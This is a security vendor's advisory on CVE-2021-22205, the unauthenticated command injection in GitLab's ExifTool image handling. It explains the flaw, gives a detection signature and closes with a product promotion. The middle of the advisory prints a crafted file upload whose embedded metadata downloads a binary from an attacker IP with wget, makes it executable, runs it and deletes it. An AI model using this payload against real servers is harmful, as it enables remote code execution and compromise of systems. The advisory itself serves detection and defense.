GitLab Unauthenticated Remote ExifTool Command Injection



Application Details

GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.


Vulnerability

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.


Identification

Files that are uploaded with extensions of jpg, jpeg or tiff are passed to the ExifTool to remove any unauthorised tags. The issue is that the file extension will be ignored and the ExifTool will try to determine the type based on the content.



Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary

AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO...
......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44.....
FORM....DJVIANTa...P(metadata
	(Copyright "\
" . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \
" b ") )                                                                                                                                                                                                                                                                                                                                                                                                                                     

Detection

By turning this vulnerability into a traffic file and matching rule, we are able to detect attempts to upload files which don't match the content type.


Coverage

Idappcom has created signature 8021990 along with a traffic file.


References

CVE-2021-22205

Hacker One Report


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can share your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional